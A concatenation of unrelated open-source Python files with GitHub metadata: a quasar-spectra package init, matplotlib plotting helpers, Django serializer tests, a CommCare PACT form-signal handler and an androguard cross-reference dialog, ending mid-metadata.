| {
"content_hash": "5ecbd704f82e861ed2ddfafb48e598ec",
"timestamp": "",
"source": "github",
"line_count": 148,
"max_line_length": 88,
"avg_line_length": 27.0472972972973,
"alnum_prop": 0.5903072695478391,
"repo_name": "madflojo/cloudroutes-service",
"id": "0f536f31a4a963949a0c1a418a4a7d22e5c9b95e",
"size": "4764",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "src/bridge/mgmtscripts/get_stats.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "17816"
},
{
"name": "HTML",
"bytes": "227943"
},
{
"name": "JavaScript",
"bytes": "3271"
},
{
"name": "Python",
"bytes": "678083"
},
{
"name": "Shell",
"bytes": "5859"
}
],
"symlink_target": ""
} |
"""
Package for working with quasar spectra
"""
from spectrum import WavelengthFunction, SpectralFluxDensity, Spectrum, read_combined_spectrum
from target import Target
import wavelength
from model import ContinuumModel
from paths import Paths
from continuum import MeanFluxContinuum, LinearFitContinuum
| {
"content_hash": "431926df73e8c0b1358c7c1435bdc0a8",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 94,
"avg_line_length": 23.692307692307693,
"alnum_prop": 0.8376623376623377,
"repo_name": "dmargala/qusp",
"id": "b520b7077594e3505c572adb3fce45b499d64aae",
"size": "308",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "qusp/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "181775"
},
{
"name": "Python",
"bytes": "89768"
}
],
"symlink_target": ""
} |
import numpy as np
from matplotlib import pyplot as plt
from mpl_toolkits.axes_grid1 import make_axes_locatable
from ivf.cv.image import trim, alpha
class SubplotGrid:
def __init__(self, num_rows, num_cols, fig=None):
self._num_rows = num_rows
self._num_cols = num_cols
self._plot_id = 1
self._fig = fig
def showImage(self, image, title, alpha_clip=True, font_size=15):
plt.subplot(self._num_rows, self._num_cols, self._plot_id)
plt.title(title, fontsize=font_size)
if len(image.shape) == 2:
plt.gray()
show_image = image
if alpha_clip:
if len(image.shape) == 3:
if image.shape[2] == 4:
show_image = trim(image, alpha(image))
plt.imshow(show_image)
plt.axis('off')
self._plot_id += 1
def showColorMap(self, image, title, v_min=None, v_max=None, cmap=plt.cm.jet, with_colorbar=True):
ax = plt.subplot(self._num_rows, self._num_cols, self._plot_id)
plt.title(title)
image_plt = plt.imshow(image, cmap=cmap, vmin=v_min, vmax=v_max)
plt.axis('off')
if with_colorbar:
if self._fig is not None:
divider = make_axes_locatable(ax)
ax_cb = divider.new_horizontal(size="8%", pad=0.05)
self._fig.add_axes(ax_cb)
plt.colorbar(cax=ax_cb, ticks=[v_min, v_max])
else:
if v_min == None:
v_min = np.min(image)
if v_max == None:
v_max = np.max(image)
plt.colorbar(ticks=[v_min, 0.5 * (v_min + v_max) ,v_max])
self._plot_id += 1
return image_plt
def showColorBar(self, image_plt):
plt.colorbar(image_plt)
self._plot_id += 1
def setPlot(self, row_id, col_id):
self._plot_id = self._num_cols * (row_id-1) + col_id
def createFigure(title, font_size=15):
fig, axes = plt.subplots(figsize=(11, 5))
fig.subplots_adjust(left=0.05, right=0.95, top=0.9, hspace=0.05, wspace=0.05)
fig.suptitle(title, fontsize=font_size)
## Maximize the matplot window.
def showMaximize():
mng = plt.get_current_fig_manager()
mng.window.state('zoomed')
plt.show()
| {
"content_hash": "7b42e524d79fbe1b5e194921f036c628",
"timestamp": "",
"source": "github",
"line_count": 70,
"max_line_length": 102,
"avg_line_length": 32.68571428571428,
"alnum_prop": 0.5598776223776224,
"repo_name": "tody411/ImageViewerFramework",
"id": "b2482a4f3baaba281cec1e836d1e58007d50ed58",
"size": "2420",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ivf/plot/window.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "GLSL",
"bytes": "8089"
},
{
"name": "Python",
"bytes": "337507"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
import importlib
import json
import re
import unittest
from datetime import datetime
from xml.dom import minidom
from django.core import management, serializers
from django.db import connection, transaction
from django.test import (
SimpleTestCase, TestCase, TransactionTestCase, mock, override_settings,
skipUnlessDBFeature,
)
from django.test.utils import Approximate
from django.utils import six
from django.utils.six import StringIO
from .models import (
Actor, Article, Author, AuthorProfile, Category, Movie, Player, Score,
Team,
)
try:
import yaml
HAS_YAML = True
except ImportError:
HAS_YAML = False
@override_settings(
SERIALIZATION_MODULES={
"json2": "django.core.serializers.json",
}
)
class SerializerRegistrationTests(SimpleTestCase):
def setUp(self):
self.old_serializers = serializers._serializers
serializers._serializers = {}
def tearDown(self):
serializers._serializers = self.old_serializers
def test_register(self):
"Registering a new serializer populates the full registry. Refs #14823"
serializers.register_serializer('json3', 'django.core.serializers.json')
public_formats = serializers.get_public_serializer_formats()
self.assertIn('json3', public_formats)
self.assertIn('json2', public_formats)
self.assertIn('xml', public_formats)
def test_unregister(self):
"Unregistering a serializer doesn't cause the registry to be repopulated. Refs #14823"
serializers.unregister_serializer('xml')
serializers.register_serializer('json3', 'django.core.serializers.json')
public_formats = serializers.get_public_serializer_formats()
self.assertNotIn('xml', public_formats)
self.assertIn('json3', public_formats)
def test_builtin_serializers(self):
"Requesting a list of serializer formats popuates the registry"
all_formats = set(serializers.get_serializer_formats())
public_formats = set(serializers.get_public_serializer_formats())
self.assertIn('xml', all_formats),
self.assertIn('xml', public_formats)
self.assertIn('json2', all_formats)
self.assertIn('json2', public_formats)
self.assertIn('python', all_formats)
self.assertNotIn('python', public_formats)
class SerializersTestBase(object):
@staticmethod
def _comparison_value(value):
return value
def setUp(self):
sports = Category.objects.create(name="Sports")
music = Category.objects.create(name="Music")
op_ed = Category.objects.create(name="Op-Ed")
self.joe = Author.objects.create(name="Joe")
self.jane = Author.objects.create(name="Jane")
self.a1 = Article(
author=self.jane,
headline="Poker has no place on ESPN",
pub_date=datetime(2006, 6, 16, 11, 00)
)
self.a1.save()
self.a1.categories = [sports, op_ed]
self.a2 = Article(
author=self.joe,
headline="Time to reform copyright",
pub_date=datetime(2006, 6, 16, 13, 00, 11, 345)
)
self.a2.save()
self.a2.categories = [music, op_ed]
def test_serialize(self):
"""Tests that basic serialization works."""
serial_str = serializers.serialize(self.serializer_name,
Article.objects.all())
self.assertTrue(self._validate_output(serial_str))
def test_serializer_roundtrip(self):
"""Tests that serialized content can be deserialized."""
serial_str = serializers.serialize(self.serializer_name,
Article.objects.all())
models = list(serializers.deserialize(self.serializer_name, serial_str))
self.assertEqual(len(models), 2)
def test_altering_serialized_output(self):
"""
Tests the ability to create new objects by
modifying serialized content.
"""
old_headline = "Poker has no place on ESPN"
new_headline = "Poker has no place on television"
serial_str = serializers.serialize(self.serializer_name,
Article.objects.all())
serial_str = serial_str.replace(old_headline, new_headline)
models = list(serializers.deserialize(self.serializer_name, serial_str))
# Prior to saving, old headline is in place
self.assertTrue(Article.objects.filter(headline=old_headline))
self.assertFalse(Article.objects.filter(headline=new_headline))
for model in models:
model.save()
# After saving, new headline is in place
self.assertTrue(Article.objects.filter(headline=new_headline))
self.assertFalse(Article.objects.filter(headline=old_headline))
def test_one_to_one_as_pk(self):
"""
Tests that if you use your own primary key field
(such as a OneToOneField), it doesn't appear in the
serialized field list - it replaces the pk identifier.
"""
profile = AuthorProfile(author=self.joe,
date_of_birth=datetime(1970, 1, 1))
profile.save()
serial_str = serializers.serialize(self.serializer_name,
AuthorProfile.objects.all())
self.assertFalse(self._get_field_values(serial_str, 'author'))
for obj in serializers.deserialize(self.serializer_name, serial_str):
self.assertEqual(obj.object.pk, self._comparison_value(self.joe.pk))
def test_serialize_field_subset(self):
"""Tests that output can be restricted to a subset of fields"""
valid_fields = ('headline', 'pub_date')
invalid_fields = ("author", "categories")
serial_str = serializers.serialize(self.serializer_name,
Article.objects.all(),
fields=valid_fields)
for field_name in invalid_fields:
self.assertFalse(self._get_field_values(serial_str, field_name))
for field_name in valid_fields:
self.assertTrue(self._get_field_values(serial_str, field_name))
def test_serialize_unicode(self):
"""Tests that unicode makes the roundtrip intact"""
actor_name = "Za\u017c\u00f3\u0142\u0107"
movie_title = 'G\u0119\u015bl\u0105 ja\u017a\u0144'
ac = Actor(name=actor_name)
mv = Movie(title=movie_title, actor=ac)
ac.save()
mv.save()
serial_str = serializers.serialize(self.serializer_name, [mv])
self.assertEqual(self._get_field_values(serial_str, "title")[0], movie_title)
self.assertEqual(self._get_field_values(serial_str, "actor")[0], actor_name)
obj_list = list(serializers.deserialize(self.serializer_name, serial_str))
mv_obj = obj_list[0].object
self.assertEqual(mv_obj.title, movie_title)
def test_serialize_superfluous_queries(self):
"""Ensure no superfluous queries are made when serializing ForeignKeys
#17602
"""
ac = Actor(name='Actor name')
ac.save()
mv = Movie(title='Movie title', actor_id=ac.pk)
mv.save()
with self.assertNumQueries(0):
serializers.serialize(self.serializer_name, [mv])
def test_serialize_with_null_pk(self):
"""
Tests that serialized data with no primary key results
in a model instance with no id
"""
category = Category(name="Reference")
serial_str = serializers.serialize(self.serializer_name, [category])
pk_value = self._get_pk_values(serial_str)[0]
self.assertFalse(pk_value)
cat_obj = list(serializers.deserialize(self.serializer_name,
serial_str))[0].object
self.assertEqual(cat_obj.id, None)
def test_float_serialization(self):
"""Tests that float values serialize and deserialize intact"""
sc = Score(score=3.4)
sc.save()
serial_str = serializers.serialize(self.serializer_name, [sc])
deserial_objs = list(serializers.deserialize(self.serializer_name,
serial_str))
self.assertEqual(deserial_objs[0].object.score, Approximate(3.4, places=1))
def test_custom_field_serialization(self):
"""Tests that custom fields serialize and deserialize intact"""
team_str = "Spartak Moskva"
player = Player()
player.name = "Soslan Djanaev"
player.rank = 1
player.team = Team(team_str)
player.save()
serial_str = serializers.serialize(self.serializer_name,
Player.objects.all())
team = self._get_field_values(serial_str, "team")
self.assertTrue(team)
self.assertEqual(team[0], team_str)
deserial_objs = list(serializers.deserialize(self.serializer_name, serial_str))
self.assertEqual(deserial_objs[0].object.team.to_string(),
player.team.to_string())
def test_pre_1000ad_date(self):
"""Tests that year values before 1000AD are properly formatted"""
# Regression for #12524 -- dates before 1000AD get prefixed
# 0's on the year
a = Article.objects.create(
author=self.jane,
headline="Nobody remembers the early years",
pub_date=datetime(1, 2, 3, 4, 5, 6))
serial_str = serializers.serialize(self.serializer_name, [a])
date_values = self._get_field_values(serial_str, "pub_date")
self.assertEqual(date_values[0].replace('T', ' '), "0001-02-03 04:05:06")
def test_pkless_serialized_strings(self):
"""
Tests that serialized strings without PKs
can be turned into models
"""
deserial_objs = list(serializers.deserialize(self.serializer_name,
self.pkless_str))
for obj in deserial_objs:
self.assertFalse(obj.object.id)
obj.save()
self.assertEqual(Category.objects.all().count(), 5)
def test_deterministic_mapping_ordering(self):
"""Mapping such as fields should be deterministically ordered. (#24558)"""
output = serializers.serialize(self.serializer_name, [self.a1], indent=2)
categories = self.a1.categories.values_list('pk', flat=True)
self.assertEqual(output, self.mapping_ordering_str % {
'article_pk': self.a1.pk,
'author_pk': self.a1.author_id,
'first_category_pk': categories[0],
'second_category_pk': categories[1],
})
def test_deserialize_force_insert(self):
"""Tests that deserialized content can be saved with force_insert as a parameter."""
serial_str = serializers.serialize(self.serializer_name, [self.a1])
deserial_obj = list(serializers.deserialize(self.serializer_name, serial_str))[0]
with mock.patch('django.db.models.Model') as mock_model:
deserial_obj.save(force_insert=False)
mock_model.save_base.assert_called_with(deserial_obj.object, raw=True, using=None, force_insert=False)
class SerializersTransactionTestBase(object):
available_apps = ['serializers']
@skipUnlessDBFeature('supports_forward_references')
def test_forward_refs(self):
"""
Tests that objects ids can be referenced before they are
defined in the serialization data.
"""
# The deserialization process needs to run in a transaction in order
# to test forward reference handling.
with transaction.atomic():
objs = serializers.deserialize(self.serializer_name, self.fwd_ref_str)
with connection.constraint_checks_disabled():
for obj in objs:
obj.save()
for model_cls in (Category, Author, Article):
self.assertEqual(model_cls.objects.all().count(), 1)
art_obj = Article.objects.all()[0]
self.assertEqual(art_obj.categories.all().count(), 1)
self.assertEqual(art_obj.author.name, "Agnes")
class XmlSerializerTestCase(SerializersTestBase, TestCase):
serializer_name = "xml"
pkless_str = """<?xml version="1.0" encoding="utf-8"?>
<django-objects version="1.0">
<object model="serializers.category">
<field type="CharField" name="name">Reference</field>
</object>
<object model="serializers.category">
<field type="CharField" name="name">Non-fiction</field>
</object>
</django-objects>"""
mapping_ordering_str = """<?xml version="1.0" encoding="utf-8"?>
<django-objects version="1.0">
<object model="serializers.article" pk="%(article_pk)s">
<field name="author" rel="ManyToOneRel" to="serializers.author">%(author_pk)s</field>
<field name="headline" type="CharField">Poker has no place on ESPN</field>
<field name="pub_date" type="DateTimeField">2006-06-16T11:00:00</field>
<field name="categories" rel="ManyToManyRel" to="serializers.category"><object pk="%(first_category_pk)s"></object><object pk="%(second_category_pk)s"></object></field>
<field name="meta_data" rel="ManyToManyRel" to="serializers.categorymetadata"></field>
</object>
</django-objects>"""
@staticmethod
def _comparison_value(value):
# The XML serializer handles everything as strings, so comparisons
# need to be performed on the stringified value
return six.text_type(value)
@staticmethod
def _validate_output(serial_str):
try:
minidom.parseString(serial_str)
except Exception:
return False
else:
return True
@staticmethod
def _get_pk_values(serial_str):
ret_list = []
dom = minidom.parseString(serial_str)
fields = dom.getElementsByTagName("object")
for field in fields:
ret_list.append(field.getAttribute("pk"))
return ret_list
@staticmethod
def _get_field_values(serial_str, field_name):
ret_list = []
dom = minidom.parseString(serial_str)
fields = dom.getElementsByTagName("field")
for field in fields:
if field.getAttribute("name") == field_name:
temp = []
for child in field.childNodes:
temp.append(child.nodeValue)
ret_list.append("".join(temp))
return ret_list
def test_control_char_failure(self):
"""
Serializing control characters with XML should fail as those characters
are not supported in the XML 1.0 standard (except HT, LF, CR).
"""
self.a1.headline = "This contains \u0001 control \u0011 chars"
msg = "Article.headline (pk:%s) contains unserializable characters" % self.a1.pk
with self.assertRaisesMessage(ValueError, msg):
serializers.serialize(self.serializer_name, [self.a1])
self.a1.headline = "HT \u0009, LF \u000A, and CR \u000D are allowed"
self.assertIn(
"HT \t, LF \n, and CR \r are allowed",
serializers.serialize(self.serializer_name, [self.a1])
)
class XmlSerializerTransactionTestCase(SerializersTransactionTestBase, TransactionTestCase):
serializer_name = "xml"
fwd_ref_str = """<?xml version="1.0" encoding="utf-8"?>
<django-objects version="1.0">
<object pk="1" model="serializers.article">
<field to="serializers.author" name="author" rel="ManyToOneRel">1</field>
<field type="CharField" name="headline">Forward references pose no problem</field>
<field type="DateTimeField" name="pub_date">2006-06-16T15:00:00</field>
<field to="serializers.category" name="categories" rel="ManyToManyRel">
<object pk="1"></object>
</field>
<field to="serializers.categorymetadata" name="meta_data" rel="ManyToManyRel"></field>
</object>
<object pk="1" model="serializers.author">
<field type="CharField" name="name">Agnes</field>
</object>
<object pk="1" model="serializers.category">
<field type="CharField" name="name">Reference</field></object>
</django-objects>"""
class JsonSerializerTestCase(SerializersTestBase, TestCase):
serializer_name = "json"
pkless_str = """[
{
"pk": null,
"model": "serializers.category",
"fields": {"name": "Reference"}
}, {
"model": "serializers.category",
"fields": {"name": "Non-fiction"}
}]"""
mapping_ordering_str = """[
{
"model": "serializers.article",
"pk": %(article_pk)s,
"fields": {
"author": %(author_pk)s,
"headline": "Poker has no place on ESPN",
"pub_date": "2006-06-16T11:00:00",
"categories": [
%(first_category_pk)s,
%(second_category_pk)s
],
"meta_data": []
}
}
]
"""
@staticmethod
def _validate_output(serial_str):
try:
json.loads(serial_str)
except Exception:
return False
else:
return True
@staticmethod
def _get_pk_values(serial_str):
ret_list = []
serial_list = json.loads(serial_str)
for obj_dict in serial_list:
ret_list.append(obj_dict["pk"])
return ret_list
@staticmethod
def _get_field_values(serial_str, field_name):
ret_list = []
serial_list = json.loads(serial_str)
for obj_dict in serial_list:
if field_name in obj_dict["fields"]:
ret_list.append(obj_dict["fields"][field_name])
return ret_list
def test_indentation_whitespace(self):
Score.objects.create(score=5.0)
Score.objects.create(score=6.0)
qset = Score.objects.all()
s = serializers.json.Serializer()
json_data = s.serialize(qset, indent=2)
for line in json_data.splitlines():
if re.search(r'.+,\s*$', line):
self.assertEqual(line, line.rstrip())
def test_helpful_error_message_invalid_pk(self):
"""
If there is an invalid primary key, the error message should contain
the model associated with it.
"""
test_string = """[{
"pk": "badpk",
"model": "serializers.player",
"fields": {
"name": "Bob",
"rank": 1,
"team": "Team"
}
}]"""
with self.assertRaisesMessage(serializers.base.DeserializationError, "(serializers.player:pk=badpk)"):
list(serializers.deserialize('json', test_string))
def test_helpful_error_message_invalid_field(self):
"""
If there is an invalid field value, the error message should contain
the model associated with it.
"""
test_string = """[{
"pk": "1",
"model": "serializers.player",
"fields": {
"name": "Bob",
"rank": "invalidint",
"team": "Team"
}
}]"""
expected = "(serializers.player:pk=1) field_value was 'invalidint'"
with self.assertRaisesMessage(serializers.base.DeserializationError, expected):
list(serializers.deserialize('json', test_string))
def test_helpful_error_message_for_foreign_keys(self):
"""
Invalid foreign keys with a natural key should throw a helpful error
message, such as what the failing key is.
"""
test_string = """[{
"pk": 1,
"model": "serializers.category",
"fields": {
"name": "Unknown foreign key",
"meta_data": [
"doesnotexist",
"metadata"
]
}
}]"""
key = ["doesnotexist", "metadata"]
expected = "(serializers.category:pk=1) field_value was '%r'" % key
with self.assertRaisesMessage(serializers.base.DeserializationError, expected):
list(serializers.deserialize('json', test_string))
def test_helpful_error_message_for_many2many_non_natural(self):
"""
Invalid many-to-many keys should throw a helpful error message.
"""
test_string = """[{
"pk": 1,
"model": "serializers.article",
"fields": {
"author": 1,
"headline": "Unknown many to many",
"pub_date": "2014-09-15T10:35:00",
"categories": [1, "doesnotexist"]
}
}, {
"pk": 1,
"model": "serializers.author",
"fields": {
"name": "Agnes"
}
}, {
"pk": 1,
"model": "serializers.category",
"fields": {
"name": "Reference"
}
}]"""
expected = "(serializers.article:pk=1) field_value was 'doesnotexist'"
with self.assertRaisesMessage(serializers.base.DeserializationError, expected):
list(serializers.deserialize('json', test_string))
def test_helpful_error_message_for_many2many_natural1(self):
"""
Invalid many-to-many keys should throw a helpful error message.
This tests the code path where one of a list of natural keys is invalid.
"""
test_string = """[{
"pk": 1,
"model": "serializers.categorymetadata",
"fields": {
"kind": "author",
"name": "meta1",
"value": "Agnes"
}
}, {
"pk": 1,
"model": "serializers.article",
"fields": {
"author": 1,
"headline": "Unknown many to many",
"pub_date": "2014-09-15T10:35:00",
"meta_data": [
["author", "meta1"],
["doesnotexist", "meta1"],
["author", "meta1"]
]
}
}, {
"pk": 1,
"model": "serializers.author",
"fields": {
"name": "Agnes"
}
}]"""
key = ["doesnotexist", "meta1"]
expected = "(serializers.article:pk=1) field_value was '%r'" % key
with self.assertRaisesMessage(serializers.base.DeserializationError, expected):
for obj in serializers.deserialize('json', test_string):
obj.save()
def test_helpful_error_message_for_many2many_natural2(self):
"""
Invalid many-to-many keys should throw a helpful error message. This
tests the code path where a natural many-to-many key has only a single
value.
"""
test_string = """[{
"pk": 1,
"model": "serializers.article",
"fields": {
"author": 1,
"headline": "Unknown many to many",
"pub_date": "2014-09-15T10:35:00",
"meta_data": [1, "doesnotexist"]
}
}, {
"pk": 1,
"model": "serializers.categorymetadata",
"fields": {
"kind": "author",
"name": "meta1",
"value": "Agnes"
}
}, {
"pk": 1,
"model": "serializers.author",
"fields": {
"name": "Agnes"
}
}]"""
expected = "(serializers.article:pk=1) field_value was 'doesnotexist'"
with self.assertRaisesMessage(serializers.base.DeserializationError, expected):
for obj in serializers.deserialize('json', test_string, ignore=False):
obj.save()
class JsonSerializerTransactionTestCase(SerializersTransactionTestBase, TransactionTestCase):
serializer_name = "json"
fwd_ref_str = """[
{
"pk": 1,
"model": "serializers.article",
"fields": {
"headline": "Forward references pose no problem",
"pub_date": "2006-06-16T15:00:00",
"categories": [1],
"author": 1
}
},
{
"pk": 1,
"model": "serializers.category",
"fields": {
"name": "Reference"
}
},
{
"pk": 1,
"model": "serializers.author",
"fields": {
"name": "Agnes"
}
}]"""
YAML_IMPORT_ERROR_MESSAGE = r'No module named yaml'
class YamlImportModuleMock(object):
"""Provides a wrapped import_module function to simulate yaml ImportError
In order to run tests that verify the behavior of the YAML serializer
when run on a system that has yaml installed (like the django CI server),
mock import_module, so that it raises an ImportError when the yaml
serializer is being imported. The importlib.import_module() call is
being made in the serializers.register_serializer().
Refs: #12756
"""
def __init__(self):
self._import_module = importlib.import_module
def import_module(self, module_path):
if module_path == serializers.BUILTIN_SERIALIZERS['yaml']:
raise ImportError(YAML_IMPORT_ERROR_MESSAGE)
return self._import_module(module_path)
class NoYamlSerializerTestCase(SimpleTestCase):
"""Not having pyyaml installed provides a misleading error
Refs: #12756
"""
@classmethod
def setUpClass(cls):
"""Removes imported yaml and stubs importlib.import_module"""
super(NoYamlSerializerTestCase, cls).setUpClass()
cls._import_module_mock = YamlImportModuleMock()
importlib.import_module = cls._import_module_mock.import_module
# clear out cached serializers to emulate yaml missing
serializers._serializers = {}
@classmethod
def tearDownClass(cls):
"""Puts yaml back if necessary"""
super(NoYamlSerializerTestCase, cls).tearDownClass()
importlib.import_module = cls._import_module_mock._import_module
# clear out cached serializers to clean out BadSerializer instances
serializers._serializers = {}
def test_serializer_pyyaml_error_message(self):
"""Using yaml serializer without pyyaml raises ImportError"""
jane = Author(name="Jane")
self.assertRaises(ImportError, serializers.serialize, "yaml", [jane])
def test_deserializer_pyyaml_error_message(self):
"""Using yaml deserializer without pyyaml raises ImportError"""
self.assertRaises(ImportError, serializers.deserialize, "yaml", "")
def test_dumpdata_pyyaml_error_message(self):
"""Calling dumpdata produces an error when yaml package missing"""
with six.assertRaisesRegex(self, management.CommandError, YAML_IMPORT_ERROR_MESSAGE):
management.call_command('dumpdata', format='yaml')
@unittest.skipUnless(HAS_YAML, "No yaml library detected")
class YamlSerializerTestCase(SerializersTestBase, TestCase):
serializer_name = "yaml"
fwd_ref_str = """- fields:
headline: Forward references pose no problem
pub_date: 2006-06-16 15:00:00
categories: [1]
author: 1
pk: 1
model: serializers.article
- fields:
name: Reference
pk: 1
model: serializers.category
- fields:
name: Agnes
pk: 1
model: serializers.author"""
pkless_str = """- fields:
name: Reference
pk: null
model: serializers.category
- fields:
name: Non-fiction
model: serializers.category"""
mapping_ordering_str = """- model: serializers.article
pk: %(article_pk)s
fields:
author: %(author_pk)s
headline: Poker has no place on ESPN
pub_date: 2006-06-16 11:00:00
categories: [%(first_category_pk)s, %(second_category_pk)s]
meta_data: []
"""
@staticmethod
def _validate_output(serial_str):
try:
yaml.safe_load(StringIO(serial_str))
except Exception:
return False
else:
return True
@staticmethod
def _get_pk_values(serial_str):
ret_list = []
stream = StringIO(serial_str)
for obj_dict in yaml.safe_load(stream):
ret_list.append(obj_dict["pk"])
return ret_list
@staticmethod
def _get_field_values(serial_str, field_name):
ret_list = []
stream = StringIO(serial_str)
for obj_dict in yaml.safe_load(stream):
if "fields" in obj_dict and field_name in obj_dict["fields"]:
field_value = obj_dict["fields"][field_name]
# yaml.safe_load will return non-string objects for some
# of the fields we are interested in, this ensures that
# everything comes back as a string
if isinstance(field_value, six.string_types):
ret_list.append(field_value)
else:
ret_list.append(str(field_value))
return ret_list
@unittest.skipUnless(HAS_YAML, "No yaml library detected")
class YamlSerializerTransactionTestCase(SerializersTransactionTestBase, TransactionTestCase):
serializer_name = "yaml"
fwd_ref_str = """- fields:
headline: Forward references pose no problem
pub_date: 2006-06-16 15:00:00
categories: [1]
author: 1
pk: 1
model: serializers.article
- fields:
name: Reference
pk: 1
model: serializers.category
- fields:
name: Agnes
pk: 1
model: serializers.author"""
| {
"content_hash": "ee21e1a29a2c776f719f064444b2230e",
"timestamp": "",
"source": "github",
"line_count": 819,
"max_line_length": 172,
"avg_line_length": 36.030525030525034,
"alnum_prop": 0.5965298722423668,
"repo_name": "hcsturix74/django",
"id": "505e599f5e517f31b3d6739a30b331d0ae7206c0",
"size": "29533",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "tests/serializers/tests.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "48399"
},
{
"name": "HTML",
"bytes": "175276"
},
{
"name": "JavaScript",
"bytes": "238848"
},
{
"name": "Makefile",
"bytes": "125"
},
{
"name": "Python",
"bytes": "11126030"
},
{
"name": "Shell",
"bytes": "809"
},
{
"name": "Smarty",
"bytes": "130"
}
],
"symlink_target": ""
} |
from corehq.apps.users.models import CouchUser
from dimagi.utils.logging import notify_exception
from pact.utils import get_case_id
from couchforms.signals import successful_form_received
import traceback
#placeholder for doing blocking vs. async via celery
BLOCKING = True
def process_dots_submission(sender, xform, **kwargs):
from pact.tasks import recalculate_dots_data, eval_dots_block
try:
if xform.xmlns != "http://dev.commcarehq.org/pact/dots_form":
return
#grrr, if we were on celery 3.0, we could do this!
# chain = eval_dots_block.s(xform.to_json()) | recalculate_dots_data.s(case_id)
# chain()
eval_dots_block(xform.to_json())
case_id = get_case_id(xform)
# get user from xform
user_id = xform.metadata.userID
cc_user = CouchUser.get_by_user_id(user_id)
last_sync_token = getattr(xform, 'last_sync_token', None)
recalculate_dots_data(case_id, cc_user, sync_token=last_sync_token)
except Exception, ex:
tb = traceback.format_exc()
notify_exception(None, message="Error processing PACT DOT submission due to an unknown error: %s\n\tTraceback: %s" % (ex, tb))
#xform_saved.connect(process_dots_submission)
successful_form_received.connect(process_dots_submission)
| {
"content_hash": "ead653cfd067d26dd807655191be7b3d",
"timestamp": "",
"source": "github",
"line_count": 35,
"max_line_length": 134,
"avg_line_length": 37.8,
"alnum_prop": 0.6817838246409675,
"repo_name": "qedsoftware/commcare-hq",
"id": "19af09f4ae127392cb0229d190d9bb3dd0553541",
"size": "1323",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "custom/_legacy/pact/signals.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "ActionScript",
"bytes": "15950"
},
{
"name": "CSS",
"bytes": "508392"
},
{
"name": "HTML",
"bytes": "2869325"
},
{
"name": "JavaScript",
"bytes": "2395360"
},
{
"name": "PHP",
"bytes": "2232"
},
{
"name": "PLpgSQL",
"bytes": "125298"
},
{
"name": "Python",
"bytes": "14670713"
},
{
"name": "Shell",
"bytes": "37514"
}
],
"symlink_target": ""
} |
from PySide import QtCore, QtGui
from androguard.core import androconf
from androguard.gui.helpers import display2classmethod, class2func, classmethod2display, method2func
from androguard.gui.sourcewindow import SourceWindow
class XrefDialog(QtGui.QDialog):
'''Dialog holding our Xref listview.
parent: SourceWindow that started the new XrefDialog
path: complete path of the class we are looking an xref from
method (optional): method of the class we are looking xref from
xrefs_list: the list of "Class -> Method" strings representing the xrefs
path/method are used for the title of the window
xrefs_list for the content of the QListView
'''
def __init__(self, parent=None, win=None, xrefs_list=None, path="", method=""):
super(XrefDialog, self).__init__(parent)
if not isinstance(xrefs_list, list) or len(xrefs_list) == 0:
androconf.warning("Bad XrefDialog creation")
return
if not method:
title = "Xrefs to %s" % path.split("/")[-1]
else:
title = "Xrefs to %s -> %s" % (path.split("/")[-1], method)
self.setWindowTitle(title)
layout = QtGui.QGridLayout()
xrefwin = XrefListView(self, win=win, xrefs=xrefs_list)
layout.addWidget(xrefwin, 0, 0)
self.setLayout(layout)
@classmethod
def get_xrefs_list(cls, d, path, method=None):
'''Static method called before creating a XrefDialog
to check if there are xrefs to display
path: complete path of the class we are looking an xref from
method (optional): method of the class we are looking xref from
'''
arg = class2func(path)
try:
class_item = getattr(d, arg)
except AttributeError:
androconf.debug("no class: %s in DalvikVMFormat d" % arg)
return None
if not method:
item = class_item
else:
arg3 = None
if isinstance(method, str):
arg2 = method2func(method)
else:
arg2 = method2func(method.get_name())
arg3 = method2func("%s/%s" % (method.get_name(),
method.get_descriptor()))
try:
item = getattr(class_item, arg2)
except AttributeError:
if arg3 != None:
try:
item = getattr(class_item, arg3)
except AttributeError:
androconf.debug("no method: %s in class: %s" % (arg3, arg))
return None
else:
androconf.debug("no method: %s in class: %s" % (arg2, arg))
return None
androconf.debug("Getting XREFs for: %s" % arg)
if not hasattr(item, "XREFfrom"):
androconf.debug("No xref found")
return None
return XrefDialog.get_xrefs_list_from_element(item)
@classmethod
def get_xrefs_list_from_element(cls, element):
'''Helper for get_xrefs_list
element is a ClassDefItem or MethodDefItem
At the end of the function, we lost if we worked on
a class or method but we do not care for now.
'''
xref_items = element.XREFfrom.items
androconf.debug("%d XREFs found" % len(xref_items))
# print xref_items
xrefs = []
for xref_item in xref_items:
class_ = xref_item[0].get_class_name()
method_ = xref_item[0].get_name()
descriptor_ = xref_item[0].get_descriptor()
xrefs.append(classmethod2display(class_, method_, descriptor_))
# print xrefs
return xrefs
class XrefListView(QtGui.QListView):
'''List view implemented inside the XrefDialog to list all the Xref of
a particular class or method.
'''
def __init__(self, parent=None, win=None, xrefs=None):
super(XrefListView, self).__init__(parent)
self.setMinimumSize(600, 400) #TODO: adjust window depending on text displayed
self.setEditTriggers(QtGui.QAbstractItemView.NoEditTriggers)
self.mainwin = win
self.parent = parent
self.doubleClicked.connect(self.doubleClickedHandler)
model = QtGui.QStandardItemModel(self)
for x in xrefs:
item = QtGui.QStandardItem(x)
model.appendRow(item)
self.setModel(model)
def doubleClickedHandler(self, index):
'''Signal sent by PySide when a QModelIndex element is clicked'''
path, method = display2classmethod(index.data())
self.mainwin.openSourceWindow(path, method)
self.parent.close()
| {
"content_hash": "620f00c7d6b1943a86fb9158174ee852",
"timestamp": "",
"source": "github",
"line_count": 126,
"max_line_length": 100,
"avg_line_length": 37.57142857142857,
"alnum_prop": 0.5918884664131813,
"repo_name": "ApplauseAQI/androguard",
"id": "3c6a3bccd9c9445dfe741663e170a263de91683f",
